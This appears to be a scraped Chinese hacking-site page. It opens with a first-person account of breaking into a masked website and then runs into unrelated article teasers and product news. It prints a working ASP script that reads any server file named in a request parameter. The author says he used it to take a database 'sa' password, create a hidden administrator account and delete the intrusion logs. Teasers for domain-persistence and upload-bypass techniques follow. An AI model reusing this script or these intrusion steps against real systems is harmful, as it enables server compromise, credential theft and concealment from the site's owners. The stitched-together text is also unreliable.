读取config.asp文件源代码的程序代码
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
<% file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "
" & server.HTMLEncode(myfile.readall) &"
"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
http://www.***.com/view.asp?file=D:\wwwroot\index.asp读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
adobe flash漏洞的后果 如何在metasploit编写该漏洞exp?
上个月爆了一个Adobe Flash的漏洞,影响Windows, Macintosh和Linux平台下的Adobe Flash Player 11 2 202 233和之前版本,Android 4 x下Adobe Flash Player 11 1 115 7及之前版本,Android 3 x和2 x下的
详情2018-01-30 20:33:19责编:llp 来源:驱动管家dsrm密码如何同步?dsrm密码同步有哪些影响?
前言本文将会讲解在获取到域控权限后如何利用DSRM密码同步将域管权限持久化。不是科普文,废话不多说。环境说明:域控:Windows Server 2008 R2域内主机:Windows XPDSRM密码同步这里使用系统安装域时内置的
详情2018-02-03 19:59:16责编:llp 来源:驱动管家检查出使用窗口的特定程序的第一步是查看端口是否开放
在局域网使用中,我们常常会发现系统中开放了一些莫名其妙的端口,这就给系统的安全带来了一些隐患。为了让端口的使用尽在掌握之中,一些朋友就会使用第三方工具来进行检查出使用端口的特定程序究竟是谁,但实际
详情2018-01-22 09:02:10责编:llp 来源:驱动管家剖析phpwind2.0.1漏洞是怎么产生的?
猫猫传给我一个phpwind2 0 1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的,我还在冒虚汗中,同时pinkeyes 的
详情2018-02-25 10:49:10责编:llp 来源:驱动管家rar加密文件怎么破解?rar加密文件破解的步骤
对于一些安全意识比较强的人来说,一般都会对文件进行加密,例如使用rar自带的加密功能进行加密,如果偶然获取了这种rar加密文件,人的好奇心肯定会促使获取资料的人去打开这些加密文件。当然网上也有很多提供资
详情2018-01-15 18:03:40责编:llp 来源:驱动管家黑客获取流量的方式有六种 你知道是哪六种吗?
DDOS攻击也叫做分布式拒绝服务攻击,其英文全称为Distributed Denial of Service attack。流量获取是DDOS攻击的最重要一环,黑客主要通过获取厂商服务器的上行流量,致使你的服务器、电脑所属的网络或者系统
详情2018-03-02 17:01:17责编:llp 来源:驱动管家突破一流信息监控系统拦截的方法:提交asp脚本文件
在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截。这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大
详情2018-02-28 11:54:18责编:llp 来源:驱动管家黑客常用哪些工具?这些工具有什么作用?
webadv:针对iis+sp3的溢出成功率很高(溢出后system权限!)ipscan:大范围网段快速ipc猜解svc:远程安装 删除Win2k服务3389 vbs:远程安装Win2k终端服务不需i386arpsniffer:arp环境sniffer(需要Winpcap2 1以上)as
详情2018-02-10 18:57:50责编:llp 来源:驱动管家密码忘了怎么办?常见的计算机网络密码破解方法介绍
我们知道,为了有效维护用户的使用权,进入电脑、上Internet、保护文档等,都要用到不同的账号或密码口令,可以说这些密码就是使用电脑的“通行证”。如果万一忘记或弄混了哪个密码,机器是不认人的,没准儿会误
详情2018-01-17 17:31:14责编:llp 来源:驱动管家maxthon浏览器的漏洞说明 为什么会出现这个漏洞?
漏洞说明:maxthon浏览器是一个强大的多页面浏览器 除了方便的浏览功能, maxthon浏览器还提供了大量的实用功能改善用户的上网体验,其在中国浏览器市场拥有大量的用户,以安全,界面友好著称。但是80sec安全组
详情2018-01-25 12:28:31责编:llp 来源:驱动管家
- 用腾讯手游助手模拟器怎么安装微信?腾讯手游助手安装微信的方法
- 苹果刷机助手爱思助手怎么进行手机安全刷机
- 这里有众多可以收看坚果手机发布会视频的直播网址
- 联想黄金斗士s8什么时候开卖?价格是多少?
- 黑客的漏洞入侵技术和补救措施
- 手机同步助手怎么情况手机垃圾?手机同步助手一键清理功能使用方法
- 小米语音助手用不了了有什么办法可以解决
- 京东涨运费的根源就在于成本
- 日本三大银行集团将在智能手机结算方面开展合作
- 大神note怎么抢购?大神note抢购有哪些技巧?
- 锤子手机怎么样?谈谈使用锤子手机的感想
- 上传木马到ewebeditor编辑器拿shell的方法
- MAPGIS十字光标能不能调大?MAPGIS十字光标怎么调节成大光标
- 圈蜜微信助手想要将信息分享到朋友圈怎么操作
- 滴滴正计划进入外卖领域 忠诚骑手月薪过万
- 路虎与Bullitt Group打造最三防手机“Land Rover Explore”
- 去年诺基亚手机全球出货量超过7000万部 何时强者归来?
- 如何解决锤子t1经常出现卡顿问题?解决方法是什么?
- 中兴axon天机mini上手体验 为什么中兴axon天机mini值得买?
- 不安装杀毒软件怎么保护你电脑?用用户方式上网